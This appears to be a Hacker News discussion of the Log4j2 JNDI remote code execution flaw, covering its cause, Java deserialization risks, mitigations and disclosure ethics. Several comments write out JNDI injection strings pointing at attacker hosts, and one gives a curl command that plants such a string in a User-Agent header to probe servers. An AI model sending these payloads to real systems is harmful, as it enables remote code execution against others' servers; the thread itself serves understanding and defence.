I've always written my own loggers, doesn't even take more than an hour in C#-land. log4net is quite a beast so I avoid it. Serilog is pretty cool though, but in most cases I just roll my own. Other than that, .net core comes with its own loggers and logging abstractions, so half the time you don't have to write your own anymore, and if you do, its super pluggable.
Just a note of appreciation for this thread. One of the things we can get out of debacles like this is a reassessment of how we should design software, and what we should look for in software designed by others. Food for thought.
Logback has an interesting commit[1]: "disassociate logback from log4j 2.x as much as possible".
They also updated their landing page [2]: "Logback is intended as a successor to the popular log4j project, picking up where log4j 1.x leaves off. Fortunately, logback is unrelated to log4j 2.x and does not share its vulnerabilities."
I don't think that's them being cheeky or anything. The first thing I thought of when I saw this vuln was whether logback was also affected - a lot of the services at my workplace use logback, and I've used logback for a couple of personal projects. It makes sense for them to come out today and say "We are not associated with log4j2 and don't have this vulnerability", especially because logback was built to succeed log4j 1.
This is such a cheap move by Logback, which comes from the former lead developer of Log4j 1.
I used to like it for its technical merits: it's really much better than Log4j 1. But its development has stagnated, and it doesn't offer anything over Log4j2 nowadays. Furthermore, it's not an Apache project, it doesn't even use the Apache License, but LGPL.
> But its development has stagnated, and it doesn't offer anything over Log4j2 nowadays.
I would say that a logging framework also needs to be boring. I don't understand why string interpolation with access to the JNDI context needs to be in core Log4j2.
I don't think it's them being cheap, I think they're reacting to a flood of questions. My very first question when I saw this was if logback was impacted. As soon as I found OP's comment, I could relax and eat breakfast.
Thanks for the write-up but I have a few questions. Why does log4j's .log() method attempt to parse the strings sent to it? It is the last thing I would expect it to do. Is the part in the sample code where the user's input is output back to them part of the exploit? If so how does it fit into the attack? What will the attacker see beyond the string they originally sent as input?
Could you update your mitigation steps to explain how to set the "log4g.formatMsgNoLookups" config? It's not clear whether this is a property that goes into the log4j config or into the JVM args.
When log4j is handed the string "${jndi:ldap://attacker.com/a}", it attempts to load a logging config from the remote address. The attacker can test for vulnerable servers by spamming the payload everywhere, and then seeing if they get requests (DNS requests for a subdomain, probably).
It's listen in the log4j docs here[0] as a feature. Funny enough, they actually call out the security mitigations they have in place for this in there with:
"When using LDAP only references to the local host name or ip address are supported along with any hosts or ip addresses listed in the log4j2.allowedLdapHosts property."
... I'm guessing they must have broken this, or the exploit found a bypass for those? I'll do some digging and update the blog post if I find anything interesting.
Fundamentally this is a format string attack. You're not supposed to do "log.info(user_supplied_stuff)", you're supposed to do "log.info("User sent: %s", user_supplied_stuff)".
Java is uncannily good at repeatedly allowing code execution via data misinterpretation across the board. The way it does serialization makes it impossible to secure. Templating libraries have forever been an issue. Endless extensibility in-line with data is a curse.
I'm not the grandparent, but there's been a slew of deserialization-related vulnerabilities in Java and .NET libraries where user input is used to instantiate arbitrary classes and invoke methods on them.
I'm not sure that's related here? Jackson is a JSON and XML serialiser/deserialiser, and it has a bunch of ways to automatically serialise and deserialise things into objects, without being provided a template. This is where the danger lies, if you just let it do its thing it can be exploited as it will load classes that the input data asks for. There have been a number of RCEs about this in recent years
I'm not sure what that has to do with the performance of concurrenthashmap under heavy collisions... ?
If I understand correctly most of the query params or POST body JSON gets mapped to a hashmap via Jackson and then POJOs gets created which can actually be an attack vector in terms of collison.
OH fair enough, that's not the attack vector that I was referring to, which is a more simple "deserialise me to something that I can use to compromise you" message, but it's another interesting vector!
What benign purpose does this feature serve and why does it have to be implemented by parsing the input string? Does the input string get modified before being written into the log?
I'll ask again because the information presented so far both in this thread on GitHub and on Twitter has been very lacking: is it necessary to return the input string back to the attacker in the response to their request in order for them to exploit this bug as you are doing in your example code?
JNDI is an interface to many kinds of naming and directory services. One common-ish use case in enterprise software is to use it as a sort of internal directory inside an application. In particular, the prefix "java:comp/env" identifies a namespace which contains configuration for the current component (servlet or EJB). So it might be rather useful to do a lookup in that when writing log messages. For example, you could have some common utility method shared by multiple components that looks up the current component name and includes it in the log output, so you can tell which component was making a request to the utility method.
The easiest way to support this would just be to allow JNDI lookups from log strings. Unfortunately, that enables all sorts of lookups!
IMHO, the real bug here is that the LDAP JNDI provider will load class files from arbitrary untrusted sources. That is an obviously terrible idea, regardless of whether JNDI is being used from a logging string or somewhere else.
The question isn't about the purpose of the feature. The question is why it's implemented with string parsing.
In C, it's unsafe to do
printf(string_variable);
because variable will get parsed as a format string. The way to solve the vulnerability is
printf("%s", string_variable);
Is that the same in Java logging libraries? Is it well-known that the logged value will be parsed? What's the safe way to log a value in Java exactly, knowing that nothing will parse that value?
What gets parsed is a string that tells the server to make a request to another server. If you use a weird protocol for that, like jndi:ldap, you can then return a class which will be automatically loaded.
So the code injection happens as the response to the remote request. The part the logger plays is that you can initiate that remote request by having the logger log some special string.
1. Attacker-controlled data is being parsed as code (format code, not Java code). I'm not sure to what degree this is the logging library's fault vs programmer error passing attacker-controlled data as a format string. I know in Go, the standard libraries take care to help programmers avoid this problem by making sure to have the character "f" in the function name to indicate the function parameter is a format string. log.Print() takes data, log.Printf() takes a format string, log.Fatal() takes data, log.Fatalf() takes a format string.
2. The format string syntax contains significantly exploitable features if an attacker can control it. This is the same as in C, because in C, printf() contains exploitable features. This is not the case in Go, because the worst the attacker can do in Go is cause the formatting to be strange or the .String() or .Error() methods to be called on the other inputs.
Note that even without 2, 1 is still a correctness problem. If I want to log attacker-controlled data, I want it to display accurately. If the attacker's User-Agent header contains weird characters, I want those to be logged exactly, not inadvertently transformed into something strange by my library.
It's not the same in Java logging libraries. You can write `logger.info("a={}")` and it won't cause any issues. At least that was the case before I read about this misfeature. I still think that log4j did absolutely wrong thing, because there are billions of lines like `logger.info("a=" + a)` and nobody's going to rewrite those lines. Breaking trust in logging library doing sane thing is absolutely terrible approach. I'm going to stick to logback everywhere I can, hopefully they did not do those stupid things.
Safe way should be something like `logger.info("a={}", a)`. Of course nobody's preventing log4j to parse any argument in any way they like. And they actually do. So with log4j there's no safe way it seems.
You can try to use context in the logging messages, e.g. the ID of the entity you are currently processing (from the HTTP request), but which might for whatever reason not be available in the code (e.g. you don't want to drill it several methods deep)
As a possible solution you can set MDC variables at the higher level, they are bound to the current thread, and reference them in the format string, and unset them after processing the entity. It's not a great solution due to temporal coupling, and you typically print it outside of an individual logging statements (e.g. add it to all logging statements), but it definitely beats drilling dozens of methods with the diagnostic identifiers.
To my knowledge JNDI is a monitoring interface allowing you to get various system values like the number of threads, heap size, process ID, etc. Somehow it's capable of being connected to LDAP.
It sounds like a classic X-to-Y-to-Z problem. Someone connected X to Y thinking Y was pretty safe even with untrusted input, not knowing it would ever proxy to Z (probably, everything you can do with JNDI on a local machine is safe). Someone else connected Y to Z thinking that Y is only passed trusted values so the new proxy feature could only be triggered deliberately. And here we are. This class of bug should have a name but probably doesn't.
And another person didn't document well that log messages must be trusted input...
JNDI was the "Java Naming and Directory Interface", part of the suite of CORBA-like Java-only distributed object tooling.
My guess is that the "lookups" feature in log4j assumed that all URL protocols were "http:" or "https:" and didn't account for either the full set of built-in protocol handlers or the fact that an application can register additional protocol handlers.
"When using LDAP only references to the local host name or ip address are supported along with any hosts or ip addresses listed in the log4j2.allowedLdapHosts property."
Those config measures were put in place as part of the fix for this issue. I.e they didn't exist before the fix was released.
The method that they're exploiting is akin to printf("whoops this is a format string"). The right way to handle user input in one of these is log.error("here's my user-provided input: {}", userInput) rather than log.error(userInput)
The string that is vulnerable is actually not meant to be user input, but a formatting string.
EDIT: nevermind, the issue apparently arises outside of formatting strings—though it would have been nice if the example had demonstrated this.
The issue occurs in incorrect logging code such as:
> logger.info("Data: " + data);
But the correct way of logging the above data is:
> logger.info("Data: {}", data);
It's analogous to using something like the following in C:
> printf(data);
In the incorrect cases (log4j or C), the user input is being used as a format string, and the user can likely cause an RCE. This is an issue in C for reasons that should be obvious. Java has historically been used very reflectively, so whenever there's some expression interpreter or deserialiser involved, there's a good chance it could be RCEd with arbitrary input.
It was a few months ago, but if I recall correctly, there were two overrides for info (and the other equivalent methods). info(String, String...) would do {} expansion like you mentioned, but info(String) would log the string directly, not doing format expansion on it.
I'm not sure how this interacts with the RCE issue reported here.
EDIT: That's because I was thinking of Slf4j, which has additional smarts here.
I'm not aware of that feature, but I guess it would mitigate this issue, since the problematic code:
> logger.info("Data: {}");
would effectively turn into something safe:
> logger.info("{}", "Data: {}");
And the issue would only arise if someone mixes the two patterns:
> logger.info("Data for " + username + ": {}", data);
Overall, I don't like the sound of that feature, since it blurs the line between correct and incorrect use of the logging API. The first argument should always be a constant formatting string.
Why though? It is not typical in Java to use format strings, unless you call String.format explicitly. It's not like C where printf-style APIs are common.
It should work one way or the other, not both. For current logging APIs, the format string is used. It actually turns out that the call using string concatenation corresponds to log4j1 rather than log4j2 (looks like this was an error in the post, though it's being fixed to use log4j2).
I guess aesthetically you could argue either way, but I think the main purpose of the formatting string method is that you can write:
> logger.trace("Updates: {}", longListOfUpdates);
and if trace logging is disabled (which can be done dynamically), it's not going to invoke `longListOfUpdates.toString()`, which is what happens when you perform string concatenation. If it didn't work that way, I suspect people would end up writing extra `logger.isTraceEnabled()` conditions around their logging code.
To see if there are injection points statically, I work on a tool (https://github.com/returntocorp/semgrep) that someone else already wrote a check with: https://twitter.com/lapt0r/status/1469096944047779845 or look for the mitigation with `semgrep -e '$LOGGER.formatMsgNoLookups(true)' --lang java`. For the mitigation, the string should be unique enough that just ripgrep works well too.
Its just incredible how bloated Log4J is. You'd think a logging library would be rather lightweight, straightforward to configure, no?
No, it is one of those efforts that suffer from their underlying problem being so well understood that, apparently, everybody working on it feels compelled to "enrich" it with more options, config layers, adapters, extensions.
I talked to a guy once who was a "hibernate expert". On his desk he had about 10 books on Hibernate. Coming from the Ruby world, I was amazed and perplexed. Is Hibernate really that much more complex than ActiveRecord? Of course it isn't. But someone benefits complex frameworks and libraries, and libraries that are over-documented to the point of absurdity.
Who benefits is Java developers. Java is a simple to learn language, and almost everyone learns it in college. As a result, competition at the entry level is fierce. You can't break into Java development coming out of college without rote memorization of Java builtin classes, knowing Hibernate and log4j like the back of your hand, and knowing all of the latest acronyms and buzzwords.
This provides a cushy barrier to entry so people who survive that can stay employed without risk from cheaper incoming developers.
Well yes, when you have a project that does 99% of what you need, you add the other 1% to the project instead of starting a whole new project. This is just how all software evolves.
Or you separately implement this feature that only you need. Instead of asking for it to be supported out-of-the-box by this very popular library where it'll operate unbeknownst to everyone else.
It’s our jobs as engineers to say no, and to try to fight that kitchen-sink tendency. It’s exhausting work, though, and I admit to just caving at work from time to time.
After having worked on software security for 20yrs+ I can tell you first hand that it is a long-term losing game. Libs, frameworks, and SDKs are written to provide functionality and interop. The more functionality/interop they have then the more popular they become and the more vulns they have.
The only winning move is not to code!
....OR learn to live in a state of constant vulns and put guardrails in place so that you can avoid shooting yourself in the foot as much as possible. In this case strict ngress/egress firewall rules in prod would prevent this from ever being exploited from what I've read on the vuln thus far.
I’m amazed at the reaction here. Lots of comments ITT about how this library is horrible and logging should be a solved problem from a security perspective. Similar commentary was here recently regarding some unsafe docker default.
Developers always want abstractions to make programming easier, but they never consider the cost of using those abstractions. It’s so convenient to place all the burden on library authors but you’re the one logging client supplied input in the first place!
Put a regex whitelist on your inputs wherever there’s a trust boundary. How come devs should never have to consider security but FOSS package maintainers do?
> Put a regex whitelist on your inputs wherever there’s a trust boundary.
No. That's a horrible idea because it requires you to think about security in multiple places and get it right every time.
Instead I am going to wrap the horrible logging library that does not automatically escape control characters within arguments in a wrapper that does. Now it's impossible for me to mess up.
Or... you know. One could have designed the logging library in such a sane way in the first place.
Are you seriously arguing that you don’t think input validation is required for untrusted input?
There’s a myriad of security vulnerabilities based off failing to escape special characters. Use output encoding if you need usernames to have special chars. There’s really no excuse to not sanitize input it’s a basic security principle.
My original comment is a joke to security minded people, because if pentesters/crooks see you're handling your inputs in that manner, they know to keep looking.
Nobody in their right mind will sanitize (and specifically not encode), on receipt, something like a name to be safe for every logging library, query language, or output in HTML/terminal/etc their backend may use. Such an undertaking is even provably impossible for combinations where one component requires escape sequences that again would need to be escaped for something else - in a circular manner. And that's just one thing that's objectively wrong about the idea.
Beyond the rules applicable to the specific type of input (for example: it should be a correctly UTF-8 encoded string with a maximum length), you treat all user inputs as opaque binary/character/whatever blobs within your system. That means your system certainly never parses such a blob looking for 'magic characters'. And only once you're going to do absolutely anything with it you apply sanitation as required for the target - and you make sure it always happens automatically as a matter of process. For example: your SQL client library will automatically build queries in a safe manner, your HTML template library will escape all provided strings by default, and your logging library will not look for magic characters in format string arguments - that's what the damn format string itself is for!
By all means use whitelists of characters for user-provided inputs (if you know what you're doing and are not going to prevent 2 billion people from using your software because you just deleted their alphabets). But don't even try to accommodate your random assortment of current and future backend technology at that point.
> Nobody in their right mind will sanitize (and specifically not encode), on receipt, something like a name to be safe for every logging library, query language, or output in HTML/terminal/etc their backend may use. Such an undertaking is even provably impossible for combinations where one component requires escape sequences that again would need to be escaped for something else - in a circular manner. And that's just one thing that's objectively wrong about the idea.
You aren't understanding. You should only need one regex per input. It's super easy. Developers should understand what data their applications expect to receive from a client.
From OWASP:
"Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering malfunction of various downstream components. *Input validation should happen as early as possible in the data flow*, preferably as soon as the data is received from the external party."
> For example: your SQL client library will automatically build queries in a safe manner, your HTML template library will escape all provided strings by default, and your logging library will not look for magic characters in format string arguments - that's what the damn format string itself is for!
Except when those libraries fail. Just like in the headline for TFA. Libraries can't always fix insecure application logic.
I don't understand how you think additional security checks are somehow detrimental. If I know some URL parameter should be a 16 character alphanumeric string, it should take you about 10 seconds to make a regex for that.
First off, how nice of you to quote only the first and last part of my comment while paraphrasing the middle part as if you're telling me something new:
> Beyond the rules applicable to the specific type of input (for example: it should be a correctly UTF-8 encoded string with a maximum length)
versus
> You aren't understanding. You should only need one regex per input.
Also you're hopping between sanitation and validation as if you believe they're the same thing. My original example was a case of doing specifically validation badly and you specifically spoke about validation in your original comment. You then replied with a comment suggesting one should apply encoding, specifically escaping, to inputs. That is not called validation.
Apparently with this most recent comment we're back to validation.
At this point I don't know how to talk to you because you seem to make this conversation about something new with each comment and I'm past humoring it.
> Also you're hopping between sanitation and validation as if you believe they're the same thing. My original example was a case of doing specifically validation badly and you specifically spoke about validation in your original comment. You then replied with a comment suggesting one should apply encoding, specifically escaping, to inputs. That is not called validation.
You know what, I admit my writing isn't excellent. I'm fully aware of the difference between sanitization and validation and frequently lump them together in technical conversations. Input validation/sanitization along with OUTPUT encoding, are major security controls that should be present in your application and proper use of these techniques will protect you most of the time with your dependencies have a security flaw.
> At this point I don't know how to talk to you because you seem to make this conversation about something new with each comment and I'm past humoring it.
You replied to me saying that regex whitelists on untrusted input was "a horrible idea" and "objectively wrong". You argued that libraries should safely handle the untrusted input for you. You argued that validation/sanitization should not happen immediately upon receipt on the input. These points are just wrong. I'm not trying to be a dick, and I think its possible to have a constructive conversation here.
Full disclosure: My day job is as a web application pentester. I've tested/reviewed hundreds of applications.
I don't expect devs to be experts on security, but what triggered my ORIGINAL comment was all the software engineers ITT bashing open source libraries without considering security in their own code.
This is exploitable in applications that use Elastic Stack with logstash as a log processor. I've just been able to reproduce it in an Magento ecommerce with payload inserted into payments details.
This why it is utmost critical to deploy the mitigating fixes to the core log aggregations first. Elasticsearch, Logstash, Graylog probably too. The vector here is even more annoying, you can think of something like:
Unrelated app writes stuff to a logfile. This get's shipped to logstash. The log message was crafted in a way to break the logstash pipeline with an exception (invalid json, grok errors or something)... which get's written to the log of logstash, including parts of the original message.
Or, you can trigger indexing errors in elasticsearch by forcing individual keys in events to have conflicting types (send "banana: 42" first, making it an int, and then send "banana: '42'", making it a string). This can cause ES to dump the field name, and sometimes a value if I recall right, to it's own log.
In both cases, this could potentially compromise a vulnerable log aggregation behind an unaffected service.
Per ESA-2021-31 [1] the common mitigation is not sufficient for logstash:
> The widespread flag -Dlog4j2.formatMsgNoLookups=true is NOT sufficient to mitigate the vulnerability in Logstash in all cases, as Logstash uses Log4j in a way where the flag has no effect. It is therefore necessary to remove the JndiLookup class from the log4j2 core jar, with the following command:
Logstash 7.16.1 should be out today to fix this... update even if mitigated:
> Users should upgrade to Logstash 6.8.21 or 7.16.1 once they are released (expected Monday 13th December). These releases will replace vulnerable versions of Log4j with Log4j 2.15.0.
I've been thinking about this since I saw it here on HN yesterday, and I can't help but entertain the idea that this might end up being 'the worst software security flaw ever'.
We tested this on several JVM versions and found you needed to go really far back, to around Java 8u121 I think, to see the specific exploit using LDAP+HTTP class loading work because they changed the value of the JVM property that allows loading a class file from a remote codebase... however, as this article points out, quite mind blowingly, early JDK11 releases also seem to have been vulnerable (I believe at least JDK 11.0.2 is not vulnerable anymore, but can't confirm right now).
We also found that other similar exploits based on JNDI can work even if the one based on LDAP redirecting class loading to a malicious HTTP server doesn't (I won't mention it here because it makes it much easier to exploit, so disabling log4j's evaluation of jndi patterns or migrating to the patched version is absolutely necessary, still).
Interesting, thank you for that analysis. From what I understand, the RCE exploit really needs two things to work: 1) The interpretation of the JNDI reference by log4j, and 2) The 'auto-execute loaded classes' (which I don't quite understand).
Is there any kind of low-level flag you can pass to Java or your environment to completely disable JNDI? I recall that there is a flag you can pass to log4j, but I can't see any reason why I would ever use JNDI anywhere in Java.
Also, do you have any additional insights on how exactly the mechanism for 2) works? From what I understand, this is a feature of Java itself?
To list the modules your JDK has, use `java --list-modules`.
If you're not using the module system, you can't completely disable JNDI, but you can tell the JVM to not load classes from a remote host by setting the system property "com.sun.jndi.ldap.object.trustURLCodebase" to "false". This has been the default in most JDKs for several years, but apparently some folks still somehow got victim to this. There are other configuration properties you can adjust listed in the javadocs for javax.naming.Context at https://docs.oracle.com/javase/8/docs/api/index.html?javax/n....
The LDAP/JNDI exploit works because when JNDI performs a lookup (and in this case, simply logging a message with `${jndi:...}` on log4j would trigger that), it might connect to a remote host that's in control of the attacker... the LDAP response from whatever LDAP server that got contacted may contain all sorts of instructions for the JVM to load classes remotely, from a HTTP server anywhere on the internet, for example. The attack I've seen used the LDAP ObjectFactory that lets the LDAP response tell where to get the bytecode of another ObjectFactory via any URL. If the JVM "com.sun.jndi.ldap.object.trustURLCodebase" property were false, this would've been blocked, but otherwise, the attacker class would be loaded and could immediately run (via a static block for example) any Java code at all on your server. Notice that this is a feature of LDAP, not a bug, but it should never have been possible for untrusted input to be used in JNDI lookup, for obvious reasons. There are other ways to "bypass" this flag by using other LDAP features that load remote code (won't list them here, but they're easy to find if you know LDAP and JNDI) or using another JNDI provider (RMI, CORBA) in case the libraries you have in the classpath include another ObjectFactory that loads remote code (e.g. many JDBC Drivers, Apache Tomcat etc.) - it's impossible to tell how many similar attacks become possible once you have JNDI opened up to untrusted input.
This attack has been known for several years... if you look hard enough you'll find whole toolkits showing how to perform these attacks dating back at least 6 years, from what I found.
Would it? It's a very common logging package, and Java is cross-platform. I also think OSes tend to be updated more often than JDKs (but I'm not sure).
It's used by Elasticsearch, so possible you could exploit the log aggregation service even if the app-level logging library isn't vulnerable, but you'd need a way to make sure the first-level logging doesn't interpret the format string.
That's funny, but it actually doesn't make sense. Java file operations involve a lot of boilerplate, so it's understandable that logging frameworks exist in Java. However, as the leading framework, log4j quickly developed "Feature Creep" and now... it has templating? A plugin architecture? Translations? Can it parse POP3 email logs yet?
> Log4j has a stupid amount of features though, it's basically a full featured logging library, plus Filebeat and Logstash all in one lib.
"Stupid" for once is the correct word. I don't want a feature where my log library downloads code from an LDAP server and runs it. I don't want a feature where interpolation is run not only on my hardcoded format string but also in the variables it references.
When software has many features, we often assume they're disabled unless we deliberately enable them and so they do little harm (other than increased code size). But this kind of on by default behavior is something else entirely.
I get it, but it really makes the case that the bog-standard library that literally EVERYONE on EVERY Java project uses be simpler, and push those other features out to other libraries.
„ Also, we can't be sure about whole scenario. There're reports that indicates this RCE is still possible in 2.15+ RCs builds, so there is a chance there are also other gateways to achieve the same effect.”
Appallingly severe because instead of having to carefully corrupt the stack or guess malicious SQL queries the adversary is deliberately provided with a general interpreter, ready to run arbitrary downloaded code without checks.
That kind of interaction isn't uncommon. Lots of projects in this ecosystem are abstractions built on abstractions, and value features over everything else.
In practice I’ve never met anyone who actually uses The Security Manager. So it might have been able to stop this with the proper configuration but I doubt anyone would have configured it to do so.
When I started working with Scala, it really surprised me how the JVM world deals with dependencies (include an upstream jar directly in the project, as opposed to the Linux distro model where you use your distributor packages so you have security and bug fixes).
I'm a big fan of Dependency Check[1].
There are hosted services that can give you security scans, but if you don't have access to that (some have a cost) or you are maintaining an open source project, Dependency Check is mostly great (there are some issues every now and then with false positives, but the maintainers are great and responsive and they deal with reports very quickly).
There are also plugins for several building tools (e.g. sbt for Scala projects).
> include an upstream jar directly in the project, as opposed to the Linux distro model where you use your distributor packages so you have security and bug fixes
good luck getting all your versions to be compatible if you do that. Oh, now your java app can only run on Ubuntu 16.04? But our customers use CentOS 7? Guess they're out of luck.
> EDIT: this may help answering the question "do I use log4j?", because transitive dependencies can be complicated!
Just run `mvn dependency:tree` or the gradle equivalent.
Worth saying that dependency-check I'm pretty sure hadn't picked it up as of Friday. It takes a while to get to the NVD lists and with this bug you don't have that kind of time.
It's good for preventing people adding known-insecure libraries though.
log4j is a very popular and ubiquitous Java library. Having a zero-day remote code execution vulnerability in it is a serious problem that undoubtedly affects a huge portion of the internet.
After ~12 hours of getting this mitigated at work, yeah. The only things I could imagine much worse would be broken RSA, or something like this in the linux network stack. Even something in SSHD would be less bad, because SSHDs tend to be protected. This occurs in the main business function of requests.
The twitter thread says something about serialized objects containing malicious code. I didn't realize Java had that. Can someone explain in more detail?
Java deserialization won't directly pull executable code from incoming bytes, but without deliberate countermeasures the deserialization runtime will happily try to create new instances of any class visible in the classpath configuration of the VM if the incoming bytes ask nicely. And many of the classes that might be present come with static code that will run once before the first class instance is created, setting up global state and the like. Others come with custom deserialization routines and when both appear together and interact with each other you get a surprisingly big space for possibile vulnerabilities to hide in. If memory serves me right, in the early days of Java deserializion vulnerabilities they usually involved some native code that was started by that mechanism. There used to be quite a lot of that, inherited from the days when Sun tried to create a multimedia powerhouse running on the inefficient JVM of the day
> This feature gives a false sense of security: nobody has ever done the necessary, extensive, code audit to prove that unpickling untrusted pickles cannot invoke unwanted code, and in fact bugs in the Python 2.2 pickle.py module make it easy to circumvent these security measures.
> We firmly believe that, on the Internet, it is better to know that you are using an insecure protocol than to trust a protocol to be secure whose implementation hasn't been thoroughly checked.
A few years ago, I think around 2016, there was a series of RCEs in many Java apps because they used the Java equivalent of pickle with the Java equivalent of "make pickle safe", which did not work.
Reminds me of the Java Applet exploit where you could combine system classes with overlapping method signatures in unexpected ways, to get the system to do untrusted things by itself without any user code. I bet __safe_for_unpickling__ has that problem.
In the Java case, it was something like: create a listbox on the screen, which contains a map entry, whose value is a java.beans.Expression object which calls a getter on some object which has side effects that allow an RCE. Because only system code is involved in the chain, Java's stack-based security model determined that this was some internal runtime code making the call, and allowed it. It doesn't make sense to put a security check on any individual step, until the final one which determined it was running in a system context, yet the overall effect was something that should not have been allowed was allowed.
The listbox innocently called toString() and what happened was RCE.
I bet in Python you could use the same concept and construct an object graph where some innocent method call ends up being an RCE. Find an object whose str() calls self.foo.toString(), find an object whose toString() calls self.bar.blah(), find an object whose blah() calls self.asdf.meh(), find an object whose meh() calls os.system(self.cmd). Now you deserialize this graph and RCE is triggered by somebody trying to log the graph.
Java has the ability to serialize a class, send it over the network, and deserialize it back into a usable class. This mechanism is quite flexible, and allows the class itself to control some aspect of it's own serialization (such as code to run post-serialization, as a form of initialiation, somewhat similar to a constructor).
So if you load a class from an unknown source (such as this exploit's example), you are basically allowing RCE.
Note that the class itself is not serialized. Only the instance of the class is serialized. The class itself is looked up by name in the running program. This is still a footgun because you can try to deserialize classes that weren't meant to be deserialized in this context, but it's a way smaller footgun than being able to just load arbitrary code into the program.
it's not any different from eval() tbh - the onus is on the programmer to not trust input. The problem is when libraries do unexpected things, like the log4j RCE.
This is a non-intrusive patch that allows you to block this vulnerability without modifying the program code/updating the dependent. So you can use it to patch third-party programs, such as Minecraft.
The principle of the library is simple: It provides an empty JndiLookup to override the implementation in log4j. Log4j2 can handle this situation and safely disable JNDI lookup.
It is compatible with all versions of log4j2 (2.0~2.15).
Anyone know of a quick way to test this just to see if it will hit the URL without setting up any exploit server to actually send any code? I guess you'd need something that reports when the DNS name gets hit (like how a DNS leak test works) but I can't find any services to do that.
but when I run that in my terminal I get the response
;; Got SERVFAIL reply from 83.146.21.6, trying next server
Server: 212.158.248.6
Address: 212.158.248.6#53
** server can't find mydatahere.a54c4d391bad1b48ebc3.d.requestbin.net: SERVFAIL
And nothing shows up in "received data" on the website.
Is that expected? Should I be running the dnsbinclient.py they provide? (I don't have the websocket module installed right now.) I did run `curl a54c4d391bad1b48ebc3.d.requestbin.net` before the nslookup, could that have made a difference here?
I'm not Requestbin's creator so I don't know. A simple nslookup or curl does work for me, with my system's DNS servers set to Cloudflare (1.1.1.1) or Google (8.8.8.8)
It looks like Vodafone (I assume this is your ISP) DNS servers aren't properly resolving the name for some reason. You could try bypassing it with dig, and directly ask a different DNS server to resolve it:
dig @1.1.1.1 A whatever.a54c4d391bad1b48ebc3.d.requestbin.net
Like, my understanding from reading the thread was that I'd be able to run this and make requests to my servers setting my User-Agent, like
curl -A '${jndi:ldap:test.a54c4d391bad1b48ebc3.d.requestbin.net/abc}' https://my-service.net
and if they're vulnerable (at least through logging user-agents, I know there are other possible avenues) something would show up on the website. Is it more complicated than that?
A LSM in enforcing mode (such as SELinux or Tomoyo) on a Linux system would prevent this. I configure and run tomoyo on all my Internet facing servers.
What I understood from that comment is that log4j 1.x is only vulnerable if you use the JMS Appender, which is probably not the most common configuration.
“Also, we can't be sure about whole scenario. There're reports that indicates this RCE is still possible in 2.15+ RCs builds, so there is a chance there are also other gateways to achieve the same effect.”
What adds to the confusion is that log4j2 rebrands itself as log4j. For example the Log4j2 artifact name is: `org.apache.logging.log4j:log4j-api` but it is actually Log4j2, not the original Log4j.
There is plenty of stuff out there that still uses Log4j 1.7, 1.8, etc. I assume this is all about Log4j2? And not about the original Log4j? Or is the original Log4j also affected?
If you are logging a user-controlled string, the user can provide a string that uses the JNDI URL schema like ${jndi:ldap://attackercontrolled.evil}. This will fetch deserialize an arbitrary Java object, which can cause arbitrary code execution (ACE). Here's an explanation of how deserializing leads to ACE: https://vickieli.dev/insecure%20deserialization/java-deseria...
Mitigation seems to disable JNDI lookups. Wouldn’t it make more sense to disable parsing altogether? In what possible situation does anyone want their logging library to run eval(…) on arbitrary inputs?!
EDIT: was not clear to me that Lumio has done only the writeup and not the original researchers finding the vulneraility
mea culpa Lunasec, you're doing god's work!
Probably there isn't a broad agreement on ethical standards related to vulnerability disclosure but is it really still a net benefit when people disclose vulnerabilities without even them knowing the implications, that are clearly not patched, let alone giving users of the software time to do anything about it.
I feel we have gotten pretty far away from Tavis Ormandy working with Cloudflare to clean up the issue before anything is published.
Do I misunderstand something or this is clearly the type of issue that will be misused widely?
This was fixed and discussed on GitHub a week ago, so the cat was somewhat out of the proverbial bag.
I would not blame the people who wrote easier to understand blog posts which are going to need circulation to half of the enterprise IT code mills in the world, and note that dang changed this post’s URL from the GitHub issue which is harder to understand.
While that is definitely a good theoretical argument but in practice it seem to be the case that most of the (non 0day) vulnerabilities that get exploited in the wild are the ones that have solid public exploits, and it does also seem to have effect on how fast it starts to be exploited.
Even if that was true, knowing that a number of large projects are using this lib I'm not sure if it is unreasonable to ask to at least make an attempt to reach out so they can asses their exposure.
> JNDI, a part of the Java Enterprise API set, providing uniform, industry-standard, seamless connectivity from the Java platform to enterprise information assets
In a properly designed system, it should be perfectly safe. The problems come from how the log input is processed. If all you're doing is appending it to a file or adding a row to a database table, that should be no problem.
In the database case it's no different to adding any other record supplied by the user. In the case of a file, consideration has to be given about what assumptions other tools that process that file may make - e.g. if they assume one record per line, then the data should be escaped appropriately (simple approach is to use JSON string escaping, or just make the whole log entry a JSON object).
If the logging system is built by someone who thought it was a good idea to parse the string, use the result to make network requests, and then executing arbitrary code based on the data received over the network, then all bets are off.
> If all you're doing is appending it to a file or adding a row to a database table, that should be no problem.
AND escaping any control/unicode* characters. encodeURIComponent() if that's the best you have, but log files need to be safe against unsuspecting sysadmins viewing/grepping/catting these. and even NT4 had a blue screen bug you could trigger by TYPE-ing the wrong file in a console..
(*) well if you need to, whitelist some safe ranges, but there's scary stuff in unicode eg with the bi-directional escapes or zero width spaces to make viewing/grepping hard.
imagine you're using stackdriver: how many thousands or millions of lines of code will those log messages touch before they're rendered in browser for someone with sysadmin privileges? how many libraries are just in the web front end they're using?
moreover imagine debugging at any point in that pipeline. i've seen approaches where it's just sanitized at render... what happens when a dev dumps the database, hits it with a cli tool or peeks a queue?
Why would you ever trust user provided input? Like seriously, ever?
I don't trust my own input. I tend to copy&paste, and I've messed up from pasting something that was previously in the clipboard because I didn't actually hit the right keyboard shortcut when I was copying the data I thought I was. I wasn't even attempting to be malicious, but I accidentally tried a SQL Inject attack on myself because of it.
Eh. I think it's pretty reasonable that people assume their logging library doesn't have random RCE, and I think it's pretty reasonable people aren't going to be able to filter every parameter based on Log4J having a relatively obscure bug.
think about the complexity involved in a modern backend. those log messages are flowing through logging libraries and a local syslog at an absolute minimum. more exotic setups involve consolidators, indexing/searching, user interfaces that may be controlled by any number of operators. moreover, those who use these tools typically have the keys to the kingdom for their respective environments.
I agree, but certain operations need to safely accept untrusted input if I'm going to handle input at all. Running a regex on user input doesn't mean I trust the input. It means I trust my regex engine. I should be able to trust my logger the same way.
Isn't it generally considered bad practice to log user controlled data (without some form of sanitization)? I think static analyzers tend to find these since they're a type of injection attack (an attacker could insert fake log lines or otherwise interfere with the log contents)
